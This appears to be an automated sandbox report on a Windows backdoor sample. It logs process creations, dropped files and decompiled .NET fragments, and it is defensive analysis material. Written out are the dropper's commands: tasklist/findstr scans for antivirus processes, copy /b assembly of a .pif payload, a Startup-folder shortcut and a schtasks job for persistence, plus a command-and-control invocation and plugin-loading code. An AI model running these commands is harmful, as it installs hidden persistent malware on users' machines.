Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static file information: File size 10515536 > 1048576

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

PE file contains an invalid checksum

Source: Northeast.0.dr

Static PE information: real checksum: 0xf6bf3 should be: 0x42226

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004902D8 push cs; retn 0048h	11_2_00490318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460DE6 push ecx; ret	11_2_00460DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045DC7C push AA0049CFh; iretd	11_2_0045DC87

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif			Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_004D26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_0045FC7C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
